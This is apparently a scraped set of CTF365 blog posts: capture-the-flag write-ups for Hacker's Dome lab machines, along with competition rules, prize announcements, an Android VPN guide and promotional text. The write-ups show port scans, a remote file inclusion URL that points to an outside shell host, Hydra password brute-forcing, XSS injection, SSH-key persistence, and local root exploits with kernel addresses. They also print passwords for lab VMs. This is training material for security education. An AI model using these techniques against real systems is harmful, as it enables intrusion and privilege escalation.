First of all, I would like to thank you all for the great support you showed us during the competition. This motivates us for developing Hacker’s Dome even further. We learned a lot during this first edition but, most importantly, we learned how we can make things better for all of our players.

You asked for official information, so here it is. We’re starting with the pristine images that were part of First Blood.

Here are the credentials for accessing them after you set them up on your own hypervisor:

• ctf01-01 root password:

  jM^Dp7>+3Z}LJ_fX3d0Yh?vZ0(4[i*p8

• ctf01-02 xubuntu password:

  ca-4u$j*wd5?LcKqAM5"(Y5tbYZ9[jEN

Both of them are SSH enabled. The images were created using VirtualBox, but they should work under most hypervisors out there. For some hypervisors, you may need to covert the images to an appropriate image format.

Please notice that the ctf01-02 machine was watered down during the competition due to some technical issues that we discovered. The short version of the story: the exploit that was needed for getting a foothold on this machine proved to be problematic over the VPN connection, even though I could successfully run the exploit by using my own network. Since this is the original image, some of our contestants’ write-ups do not apply. You can take a stab at owning this piece until we do the official write-ups.

Download links:

ctf01-01
ctf01-02

This article is for information security and network security teachers, students who want to become security professionals or system administrators, and university representatives whose university offers information security or network security courses.

Cyber security has become a global affair, reaching nations in every corner of the world. As a result, the entire world must make preparations at the earliest stage possible. 

According to the 2013 (ICS)² Global Information Security Workforce Study by Frost & Sullivan, there will be 4 million security professionals by the end of 2015, and 4.9 million by the end of 2017. So, what does this mean? Well, it means that significant improvements must be made in the training arena to effectively prepare the next generation of security professionals. 

To support the growing demand for improved InfoSec training and preparation, CS faculties are positioning themselves on the frontline. This frontline approach is demonstrated through university-hosted and government-hosted CTF (capture the flag) competitions, as shown in the following examples:

CSAW 2014

HSCTF

CyberPatriot

The Honeynet Project

To support early training for the InfoSec industry, CTF365 offers a free account that gives users unrestricted access to vulnerable-by-design servers and web applications. Free account users can currently train on Metasploitable and bWAPP but, in the future, CTF365 plans to implement additional virtual machines and expand its cloud-based vulnerable-by-design lineup.

As free account users grow their skills, they can transition to a CTF365 paid account. Paid account users are given access to the CTF365 main arena, which currently hosts more than 80 fortresses (servers) and 200 web applications. Unlike other penetration testing labs, the fortresses found in the CTF365 main arena are created, maintained, and defended by other users. This creates a unique opportunity for users to practice both offensive and defensive security strategies without the downsides that are associated with intentionally vulnerable designs. 

At CTF365, we understand the economic hardships that go along with being a college student. We also understand that eating Top Ramen for an entire semester can take a toll on you. That’s why we created the Student CTF365 plans, low cost security training programs for students. Students can choose from the following three tiers:  

Student Access $15:

• Access to the CTF365 main arena

Student Plus+ $22:

• Access to the CTF365 main arena
• Access to the Hacker’s Dome CTF weekend competitions

Student Pro $29 (coming soon):

• Access to the CTF365 main arena
• Access to the Hacker’s Dome CTF weekend competitions
• 1 fortress (virtual server in the main arena)
• 5 custom CTF365 domains (.ctf and .365)

Who qualifies for the Student CTF365 Plans?

To confirm student status, users must use an email address with a .edu domain during registration. Additionally, users must answer to our confirmation email to confirm and activate their account.

If you’re a student who would like to benefit from our Student Security Training Program but your university doesn’t own a .EDU domain, please send an email to support@ctf365.com and include the following details: 

Subject: “Student Security Training Program – New University Domain”

Body: Your full name, the name of your school, and the domain name to be added for our Student Security Training Program.

Why join?

As Joseph Greenwood stated during his 2014 BSides London presentation:

“Hands-on learning is epic”

CTF365 it’s a top notch Security Training Platform with a focus on Security Professionals, System Administrators and Web Developers that offers five stars services regarding training, learning and improving offensive and defensive web security 

Any questions? Glad to answer.

I’ll try to keep this information to a minimum for better readability. The setup was replicated over a local network for faster access.

ctf01-01, IP address: 10.200.0.4

Enumeration:

nmap -sS -p 1-65535 10.200.0.4

Starting Nmap 6.45 ( http://nmap.org ) at 2014-05-23 13:06 EEST
Nmap scan report for 10.200.0.4
Host is up (0.00013s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:89:35:6E (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 6.67 seconds

nmap -sU 10.200.0.4

Starting Nmap 6.45 ( http://nmap.org ) at 2014-05-23 13:06 EEST
Nmap scan report for 10.200.0.4
Host is up (0.00044s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:89:35:6E (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 1092.14 seconds

The web server running on 80/tcp doesn’t give up any information from the index, but a web scanner doesn’t hurt.

nikto -host 10.200.0.4 -C all
- Nikto v2.1.6
—————————————————————————
+ Target IP: 10.200.0.4
+ Target Hostname: 10.200.0.4
+ Target Port: 80
+ Start Time: 2014-05-23 13:08:41 (GMT3)
—————————————————————————
+ Server: Apache/2.2.3 (CentOS)
+ Server leaks inodes via ETags, header found with file /, inode: 2130490, size: 179, mtime: Wed Mar 3 04:53:52 2027
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Cookie openscrutin created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.1.6
+ OSVDB-3092: /development/: This might be interesting…
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake’s list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 22353 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2014-05-23 13:09:45 (GMT3) (64 seconds)
—————————————————————————
+ 1 host(s) tested

There are a couple of interesting items: the /info.php script and the /development/ directory.

The info.php script is a simple script that runs the phpinfo() function. This is a fairly common mistake made by PHP developers, leaving scripts like this for getting this information from the production server. Unfortunately, “baddies” may also discover these poorly thought-out decisions.

The juicy bits from phpinfo() are:

PHP 5.1.6 and allow_url_fopen = On

This is a PHP default configuration option and, prior to PHP 5.2.0, will allow the remote inclusion of PHP code. PHP 5.2.0 adds allow_url_include, which is disabled by default to mitigate remote file inclusion attacks.

register_globals = On

This is a common “misconfiguration” made by developers who are too lazy to get stuff out of superglobals, such as $_GET and $_POST. Therefore, when the register_globals configuration option is turned on, $_GET['foo'] is registered as a global $foo. When combining this “misconfiguration” with allow_url_fopen and sloppy coding full of include statements that use uninitialized variables, the result is a guaranteed recipe for disaster.

The application from /development/ is the perfect example of the recipe mentioned above: Openscrutin 1.03 (RFI/LFI) Multiple File Include Vulnerability.

The first RFI example is http://shell4u.tk/[path]/obj/droit.class.php?path_om=[Shell]

Putting that into practice:

I’d like to point out that the machine is running a 32-bit build. As pointed out by some of our contestants, some of you attempted to hit it with 64-bit local root exploits. That’s a big no-no. uname -a on the target machine and gcc’s -m32 flag on your machine are your friends.

The 2.6.18-8.el5 is vulnerable to the venerable Sendpage Local Privilege Escalation, also known as CVE-2009-2692. I used this exploit because, in my experience, it works well on most targets.

gcc -m32 9545.c -o sock_sendpage
file sock_sendpage
sock_sendpage: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0xa7e09b5a2c75ae82884ab06a9f378491eb6221a7, not stripped

ctf01-02 – the First Blood edition, IP address: 10.200.0.6

As previously mentioned, this machine was watered down due to technical issues. Although it took us longer to deploy, you got two machines as we promised.

I’ll start with the “easy way in”. I added a user that is also used for HTTP Basic Authentication on this machine, simulating a common mistake: credential reuse.

root@ctf01-02:~# adduser admin
Adding user `admin’ …
Adding new group `admin’ (1001) …
Adding new user `admin’ (1001) with group `admin’ …
Creating home directory `/home/admin’ …
Copying files from `/etc/skel’ …
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for admin
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]
root@ctf01-02:~#

This part also includes a hidden flaw that is due to a default Ubuntu policy, which some people are unaware of. If you add an admin user, sudo allows this admin user to run stuff as root, even though it isn’t obvious in the above dialogue.

The issue is the default sudoers policy:

root@ctf01-02:~# cat /etc/sudoers | grep ALL
root ALL=(ALL:ALL) ALL
%admin ALL=(ALL) ALL
%sudo ALL=(ALL:ALL) ALL

This shows that there are two “supergroups” there – sudo and admin. However, before running the adduser command, there wasn’t any admin group; only the sudo group exists.

Enumeration:

nmap -sS -p 1-65535 10.200.0.6

Starting Nmap 6.45 ( http://nmap.org ) at 2014-05-23 14:31 EEST
Nmap scan report for 10.200.0.6
Host is up (0.00021s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:4B:D2:34 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 7.32 seconds

nmap -sU 10.200.0.6

Starting Nmap 6.45 ( http://nmap.org ) at 2014-05-23 14:31 EEST
Nmap scan report for 10.200.0.6
Host is up (0.00065s latency).
Not shown: 949 closed ports, 50 open|filtered ports
PORT STATE SERVICE
5353/udp open zeroconf
MAC Address: 08:00:27:4B:D2:34 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 1022.47 seconds

However, the port 80/tcp is behind password authentication:

curl -I 10.200.0.6
HTTP/1.1 401 Authorization Required
Date: Fri, 23 May 2014 11:32:27 GMT
Server: Apache/2.2.22 (Ubuntu)
WWW-Authenticate: Basic realm=”Private party; admin area”
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1

The WWW-Authenticate: Basic realm header indicates what a good guess for the username would be. Anyway, “admin” is definitely a Top 20 username, hence an easy guess with a basic brute force attack.

cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/unix-os/
ls
unix_passwords.txt unix_users.txt
hydra -L unix_users.txt -P unix_passwords.txt http://10.200.0.6/
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak – for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-23 14:43:24
[WARNING] The service http has been replaced with http-head and http-get, using by default GET method. Same for https.
[DATA] 16 tasks, 1 server, 108000 login tries (l:108/p:1000), ~6750 tries per task
[DATA] attacking service http-get on port 80
[80][www] host: 10.200.0.6 login: admin password: qwerty

The brute force succeeds fairly quickly. Since SSH is open, it’s worth trying the same credentials:

ctf01-02 – the original edition, IP address: 10.200.0.6

This is the write-up for the original machine that didn’t take part in the competition. This is what you get in the pristine image that was made available for download. The intention was to make this the “intermediate” level image, but it happened to be the easy one.

I discovered that I couldn’t replicate the attack by using an isolated network without Internet access. If the client-side exploit fails, try to provide Internet access to the machine. We tried to provide Internet access to the machine on the Hacker’s Dome network, but I was still unable to get a reliable exploit.

At this point, I skipped to the point where the HTTP Basic Authentication is bypassed with admin/qwerty. There’s a web application running there which states: “Hi people. Post a message while I’m AFK. Say what you need. I’ll check periodically to see if there’s something new.”

It proves to be vulnerable to XSS:

The next step is to verify if another client is accessing this resource. So, while monitoring Apache’s access log, I injected an iframe <iframe src=”http://10.0.0.4/”>:

So there’s some information about the user agent of the admin who checks his messages: Firefox/17.0. By doing a little research, this page shows up: Firefox 17.0.1 Flash Privileged Code Injection.

Putting that into practice:

The connection is unstable since the remote user agent is restarted often, therefore the access needs to be fixated quickly. Since the SSH port is open and a daemon is running there, the fastest option is to add your SSH public key to ~/.ssh/authorized_keys.

pwd
/home/xubuntu
mkdir .ssh
echo “ssh-rsa [the rest of the public key]“ > .ssh/authorized_keys
cat .ssh/authorized_keys
ssh-rsa [the rest of the public key]
chmod 600 .ssh/authorized_keys

The installed kernel proves to be vulnerable to the quite fresh CVE-2014-0038. This public exploit proves to be the fastest, even though it requires editing some addresses to make it work under this kernel.

The addresses for Ubuntu 12.04 running 3.8.0-29-generic are:

PTMX_FOPS 0xffffffff81f16f20LL
TTY_RELEASE 0xffffffff81420c30LL
COMMIT_CREDS 0xffffffff81086780LL
PREPARE_KERNEL_CRED 0xffffffff81086a00LL

timeoutpwn.c needs to be updated with these addresses and uploaded to the victim machine since there’s a gcc installation there.

Then, there’s a clear path to root:

First, we’d like to say thanks to all of our Hacker’s Dome – First Blood CTF participants and supporters for making this such an awesome experience. Now, we’re glad to announce the top 3 contestants.

The winners are as follows:

1st Place – Warriar – Germany with 3496 points

2nd Place – BrokenByte – Italy with 8853 points

3rd Place – yF – Germany with 12105 points

The points are a function of time: t1 * w1 + t2 * w2. The lowest score wins.

• t1 = number of seconds needed for sending the ctf01-01 superuser flag
• w1 = the weight coefficient for t1, in this case 0.4 as the machine had a higher difficulty than ctf01-02
• t2 = number of seconds needed for sending the ctf01-02 superuser flag
• w2 = the weight coefficient for t2, in this case 0.6

The full score board for all successful submissions: 

DNF = Did Not Finish

The reference timestamps for the start of the competitions are: 2014-05-17 18:09:00 for ctf01-01 and 2014-05-17 20:17:00 for ctf01-02. All of the timestamps are expressed in UTC+2.

The Official Write-up

The Machines

At this moment we are working on our next CTF competition, which will be free to all of our Bronze Account and Student Plus+ users. Starting date to be announced soon.

CTF365 it’s a top notch Security Training Platform with a focus on Security Professionals, System Administrators and Web Developers that offers five-star services regarding training, learning, and improving offensive and defensive web security.

Any questions? Glad to answer.

As you already know, Hacker’s Dome – First Blood CTF competitions had an awesome raffle where the King Prize was a Full Year Metasploit Pro License followed by 4 Rasberry Pi, and 20 Hat + T-shirt sets . Here’s the winners for First-Blood The Raffle:

Bellow you have the recorded Hacker’s Dome First Blood raffle draw.

Stay secure while having fun.

CTF competitions are the perfect excuse to get together and hack at will. They’re also an entertaining and hands-on way to learn security.

As you all know, we created Hacker’s Dome as a place for CTF365 users to play weekend CTFs with great prizes. In order to get access to Hacker’s Dome, the first thing you need is a registered and confirmed CTF365 account.

First Blood was awesome and now it’s time to move on to the next one as we promised. This time will be different. Team based, FREE to all CTF365 registered (and confirmed) users, more flags and for sure, more fun.

Hacker’s Dome – Double Kill

Difficulty Grade: Beginner/Intermediate

Format: Team Based

Starting Date: July 26 2014 15:00 UTC

Ending Date: July 27 2014 15:00 UTC

Rules: Yet to come

The Prizes:

First Place:

One year CTF365 Premium Access (because you love to train your skills)

Second Place:

6 Months CTF365 Premium Access (because you love to train your skills)

Third Place Package:

3 Months CTF365 Premium Access (because you love to train your skills)

More surprise prizes yet to come. 

Prepare your PenTest tools, tell your friends, challenge your enemies and get ready for the competition.

Any questions? Glad to answer. Stay secure while having fun.

This guide will teach you how to connect to the CTF365 VPN from your Android smartphone or tablet. If you don’t already have a CTF365 account, you can create one for free here.

IMPORTANT – Your Android device must be rooted to complete this tutorial. If you don’t know how to root your device, there are lots of guides on the Internet that will show you. Just Google something like:

“How to root a (your phone make/model) (your carrier)”

Alright, let’s go ahead and get started. First, we need to log into our CTF365 account and download our VPN configuration files.

Step 1

Log into your CTF365 account

Step 2

Click on your username and select “VPN” from the drop-down menu

Step 3

In the VPN pop-up menu, click each of the three download links to download your VPN files

NOTE: You should now have the following three files:

Step 4

Create a folder titled “ctf365″ and place all three of your VPN files inside of it

Step 5

Extract the cert.tgz file

NOTE: You should now have a folder titled “cert” that contains the following four certificates:

Step 6

Open the cert folder and move the four certificates into the ctf365 folder

NOTE: You can delete the cert.tgz file and the empty cert folder now

Step 7

Move the ctf365 folder into the home directory on your Android device

Step 8

Download and install OpenVPN for Android from the Google Play Store

Step 9

Launch the OpenVPN for Android app

Step 10

Click the import button 

Step 11

Navigate to the ctf365 folder, choose the client.conf file, and click “Select”

Step 12

To complete the import, click the save button

NOTE: You should now have a VPN profile titled “client”

Step 13

Refer to your client VPN profile and click the settings button 

Step 14

Select the “Advanced” menu

Step 15

Untick the box beside “Enable Custom Options”

NOTE: If you leave this option enabled, you will not be able to connect to the CTF365 VPN

Step 16

Navigate back to the main menu and click the “client” VPN profile

Step 17

In the prompt, tick the box beside “I trust this application” and click “OK”

NOTE: The OpenVPN log window will appear as the connection attempt begins

Step 18

Refer to the log and look for the “Connected:SUCCESS, …” statement. If you see this statement, you have successfully connected to the CTF365 VPN.

Conclusion

Now that you’re connected to the CTF365 VPN from your Android device, you can experience CTF365 like never before. Go ahead, explore! Access Metasploitable, DVWA, and bWAPP in the cloud. If you’re a bronze account holder and you have a fortress (server) in the CTF365 main arena, use an app like ConnectBot or Terminal Emulator to log into your fortress. Scan the arena with Nmap, brute force a target with Hydra, or do some Metasploit magic! Whatever you do, enjoy your newfound freedom!

“Do you want to sell sugar water for the rest of your life, or do you want to come with me and change the world?”

Steve Jobs to Pepsi executive John Sculley

Looks like we grow faster than anticipated which is a good thing for two reasons: for us as a startup project, and for some of you as a great opportunity if you’re student that wants to work and get experience in the information security related niche. For that reason we declare:

Internship Opportunity Announcement:

Where: CTF365 Platform

How long: Summer/Fall

Position Title: Web Developer Intern

DUTIES/JOB DESCRIPTION:

The Intern will work closely with our web developer leader who will be his/her mentor.

HOURS:

Flexible – Being a remote working, the biggest advantage is that you can manage your time.

REQUIREMENTS:

Passion:

If there is no passion, then you can skip this Intern position. Passion for coding and thirsty for learning new things it’s a MUST.

Operating System:

Whatever suits you.

Coding:

Ruby on Rails, Git and HAML it’s needed. Everything else among these will be much appreciated.

Though this is not a paid position, there will be plenty for you and us in there.

What’s In It For You As An Intern:

• Improving your coding skills
• Prospective career path
• Opportunity to become part of CTF365 A-team
• Full Access to the best Security Training Platform out there
• Best team mates ever – We’re an international team, working remotely, driven by our passion for the project.
• Best recommendation ever.
• Learning defensive security – Learning how real security professionals will attack your setups will make you improve your defensive security.

HOW TO APPLY:

Candidates can submit an email to support [at] ctf365 [dot] com with Subject Line: Web Developer Intern, telling us what you’re good at, giving us some links if you have some projects you’ve been working on (show off — we love that).

Stay secure while having fun.

When we started to build our security training platform, one of our core objectives was to make the platform flexible. We wanted to provide our users with the flexibility and convenience of connecting their own fortresses (servers) regardless of their location, operating system, cloud solution, private machine, and pentest lab setup.

We’re proud to announce that we delivered on our promise and, as of today, Windows Azure is here. You will find it in the CTF365 Main Arena.

All of this was made possible by Microsoft’s BizSpark program, a program designed to provide promising startups with exposure, support, and free software. We joined Microsoft’s awesome startup program and, as a result, have been given free Microsoft products for our users.

If you’re interested in starting your own startup project, we encourage you to apply to BizSpark. In addition to getting access to Microsoft products, you’ll receive full support and become a member of a large startup community. The BizSpark program is also helpful if you’re bootstrapped (self funding) like we are. 

Being admitted into the BizSpark startup program, we achieved three things:

• We’ve gained Microsoft’s recognition as a valuable startup project
• We’ve demonstrated the flexibility of our platform and proven it to be a state of the art penetration testing lab
• We’ve given our users the opportunity to train their hacking skills on Windows products such as Windows Server 2008 and Windows Server 2012

By joining the BizSpark startup program, CTF365 Silver and Gold account users will be able to use any Microsoft product in our Main Arena with zero licensing costs. This includes Windows 3.1, WindowsXP, Windows Server 2012, SQL Server, Share Point Server, and several other Microsoft products.

So, what’s next? AWS. That’s right, we’re already working hard to bring Amazon Web Services (AWS) to CTF365. We stated that we provide top notch services for the InfoSec Industry, and that’s exactly what we’re going to do. 

CTF365 it’s a top notch Security Training Platform with a focus on Security Professionals, System Administrators and Web Developers that offers five stars services regarding training, learning and improving offensive and defensive web security

Any questions? Glad to answer.

Art. 1 “Double Kill” is an offensive CTF (Capture The Flag) competition in which competitors are ranked based on their individual/team skill level and their ability to use their professional skills in compliance with applicable legislation and international Internet communications regulations. The competition’s difficulty level has been designed for participants of beginner and intermediate skill levels.

Art. 2 The “Double Kill” competition is scheduled to commence on July 26 at 15:00 UTC and conclude on July 27 2014 at 15:00 UTC. If, for any reason, the competition cannot be held on the scheduled date mentioned above, the competition will be rescheduled. In the event of a reschedule, participants will receive prior notification detailing the new competition schedule.

Art. 3 To help ensure impartiality and eliminate unfair advantages, all “Double Kill” organizers, staff members, and affiliates are excluded from participating in the competition.

Art. 4 Only those participants who agree to have their name published on the website, http://ctf365.com/, are eligible to be declared a winner and receive the corresponding prize.

Art. 5 The competition will have the following technical rules:

• The ranking in the competition is based on the time it takes you to complete the challenges. You have 24 hours of VPN access to complete the challenge. The timer stops when you provide the correct “superuser” trophy.
• The trophies are listed as such:
  • superuser-trophy.txt – found in the home or desktop directory of the superuser (root or Administrator)
  • user-trophy.txt – found in the home or desktop directory of the unprivileged user and may be used to gain a foothold on the machine. This trophy is not present on the machines that can be compromised without elevating your privileges.

  Each trophy file contains a distinct SHA-1 hash encoded as HEX.

• Attacking our infrastructure is not part of the competition and will result in immediate disqualification. If you’re disqualified, you will not be eligible to win a prize or participate in the raffle.
• In order to validate your time, we require that you submit a “proof of work” within 24 hours after the competition ends. “Proof of work” includes:
  • a screenshot showing your superuser access or, if you were unable to obtain superuser access, a screenshot showing your unprivileged access.
  • a technical report describing in detail each step needed to compromise the machine.

  We must be able to use your report to reproduce your work. If we are unable to do so, the next contestant with a valid report will replace you. We do not have unlimited resources; therefore, only reports for the prize winning places will be evaluated. You must submit your report and screenshots in an email to support@ctf365.com. To ensure all of the details are readable, your screenshots must be high quality JPEG or PNG files. If the details are not clearly visible in your screenshots, your screenshots will be discarded. Your report must be a text file, a PDF document, or an ODT document. Your report and screenshots must be placed in a single archive file before emailing them to us. Acceptable archive formats include RAR, Zip, Gzip, and Bzip2.

  • After the competition is finished and the winners are announced, we will publish the machine images that took part in our competition. We will also publish some explanations.
  • In the event of a dispute, we may disclose the rejected reports to the competition participants for peer review.
  • You don’t need to waste your stash of 0-days for our competition. All of the challenges are designed by using public exploits and/or software misconfigurations. We use Kali and the basic tools for the purpose of demonstrating the concept of a CTF challenge when we discuss the technical aspects of a competition.
  • The use of mass-vulnerability scanners is discouraged. It will likely drop your VPN connection or freeze the target machine.
  • We don’t provide any hints during the competition. We provide you the same advice as the awesome folks at Offensive Security: Try Harder™. If technical problems are experienced, we will answer properly formulated questions about certain aspects of the competition. A properly formulated question is something like: “I tried to use the foo with the arguments bar over the protocol baz in order to obtain information X”. Do not abuse the support.
• Submitting a Flag:
  • Use the up right corner “Hackers Dome” button from CTF365 website (you must be logged in)

• There are two ways to report technical-related issues (e.g. VPN connection, sending flags):
  • Online on CTF365 IRC chat, by sending private messages to all operators in the #Lobby channel. IRC server: irc.ctf365.com channel: #lobby
  • By e-mail at support@ctf365.com

  Remember that there are hundreds of competitors; therefore, nontechnical issues will be ignored. Please do not abuse our time.

Art. 6 Participants may submit appeals to support@ctf365.com within 24 hours after the competition results become publicly available. Appeals will be reviewed and responded to within 7 days of receipt. Appeal responses will be sent to the appealing participant by e-mail.

Art. 7 The winner’s name will be displayed with their consent on http://hackersdome.com/ and http://www.ctf365.com 14 days after the competition ends.

Art. 8 For premium access prizes, winners will receive their login information and credentials by email.

Art. 9 Players should not interfere with other player’s experience. We may ban you from the competition if you are being reckless as it is not the purpose of these CTFs.

When you’re trying to get involved in the information security industry and become a security professional, having access to a fully functional penetration testing lab is critical. The pentest lab is where you’ll develop your skills, learn new tactics, and expand your knowledge. Setting up a pentest lab, however, can be both challenging and expensive. That’s why we created the CTF365 free account, a free account that allows members to access our free online pentest lab

We already have Metasploitable and bWAPP in the cloud. Now we have more great news for CTF365 free account members. As we promised, we’ve extended our free pentest lab by adding “Hacme Bank” and “Hacme Casino,” courtesy of McAfee Foundstone.

Hacme Bank

“Hacme BankTM is designed to teach application developers, programmers, architects and security professionals how to create secure software. Hacme BankTM simulates a “real-world” online banking application, which was built with a number of known and common vulnerabilities such as SQL injection and cross-site scripting.”

You can read the official Hacme Bank documentation HERE

Hacme Casino

“Hacme CasinoTM is a learning platform for secure software development and is targeted at software developers, application penetration testers, software architects, and anyone with an interest in application security.”

You can read the official Hacme Casino documentation HERE

Also, since we got into the Microsoft BizSpark startup program, CTF365 members can now train their hacking skills against Windows Server 2008 and WindowsXP, the OSs that Hacme Bank and Hacme Casino are deployed on.

By adding these components to our free pentest lab, we hope to help new comers and ethical hacker wannabes find their way into the security industry as qualified security professionals.

If you’re an InfoSec instructor or teacher, feel free to use these applications in the cloud to create webcasts and teach your students. Also, if you’re a screencaster, feel free to use them in your video tutorials. Don’t forget to share your creations and experiences with us. We’d love to hear about them

You can access the servers at:

http://hacmebank.ctf (http://10.195.2.5)

http://hacmecasino.ctf (http://10.195.2.6)

In order to access them, please remember that you have to be logged into our VPN.

If there’s a vulnerable-by-design server or web app that you’d like to see in the CTF365 cloud, leave the information for us in a comment below. We’ll review it and, if we think it’ll be a valuable contribution, we’ll add it to the cloud in the future.

We believe that entry level resources should be open and free of charge for anyone who wants to dive into the InfoSec industry. Through this, we think we can make the Internet a little bit safer.

CTF365 it’s a top notch Security Training Platform with a focus on Security Professionals, System Administrators and Web Developers that offers five stars services regarding training, learning and improving offensive and defensive web security

Any questions? Glad to answer.

Stay secure while having fun.

Download links for the machine images:

• ctf02-01
• ctf02-02

We recommend running the machine images inside of VirtualBox, which is the supervisor that we used to create the challenges. Installing and running these images should be trivial.

The credentials for accesing the machines are (updated on 22nd of August, 2014):

• ctf02-01: ubuntu with 4;9M3kr%5jn0otCca>]eVO.,Vog>ml7[
• ctf02-02: root with 7m[Y5TNz')6`|@p:JLP"A\#M*6<4J~lz

ctf02-01, IP address: 10.200.0.4

Enumeration:

nmap -sS -p 1-65535 10.200.0.4

Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-13 12:39 EEST
Nmap scan report for 10.200.0.4
Host is up (0.0012s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:DF:18:9D (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 8.37 seconds

Scan the HTTP server:

nikto -host 10.200.0.4 -C all
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.200.0.4
+ Target Hostname: 10.200.0.4
+ Target Port: 80
+ Start Time: 2014-08-13 12:41:17 (GMT3)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ The anti-clickjacking X-Frame-Options header is not present.
+ Root page / redirects to: /phpMyAdmin-4.2.6-all-languages
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ /cgi-bin/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 284076, size: 5108, mtime: Tue Aug 28 13:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See http://www.kb.cert.org/vuls/id/520827
+ 22354 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2014-08-13 12:42:51 (GMT3) (94 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The most interesting information comes from the line that states, "+ OSVDB-: /?-s allows the retrieval of the PHP source code, making it vulnerable to CVE-2012-1823." This means that the PHP is vulnerable to argument injection, which can be used to achieve remote code execution.

Metasploit's php_cgi_arg_injection module is appropriate for getting a foothold on this machine.

Side note: /cgi-bin is actually linked to /usr/bin. The above vulnerability is not required to gain a foothold. You do have to get a little bit creative in order to exploit the machine via this method, but I'm leaving this out as homework.

As the machine runs the 3.2.0-23-generic kernel, you can find an exploit for it on exploit-db.com.

From there, getting to root is really easy given the fact that a gcc is already installed for your convenience.

ctf02-02, IP address: 10.200.0.6

This machine was a pain in the ass for most of you but you may learn some new things while trying to take it down.

Enumeration:

nmap -sS -p 1-65535 10.200.0.6

Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-13 13:48 EEST
Nmap scan report for 10.200.0.6
Host is up (0.00072s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:48:04:9C (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 9.19 seconds

Using scanners like nikto doesn't really help on this target:

nikto -host 10.200.0.6 -C all
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.200.0.6
+ Target Hostname: 10.200.0.6
+ Target Port: 80
+ Start Time: 2014-08-13 13:50:18 (GMT3)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Server leaks inodes via ETags, header found with file /, inode: 262222, size: 150, mtime: Fri Jul 25 23:31:47 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 22354 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2014-08-13 13:51:30 (GMT3) (72 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

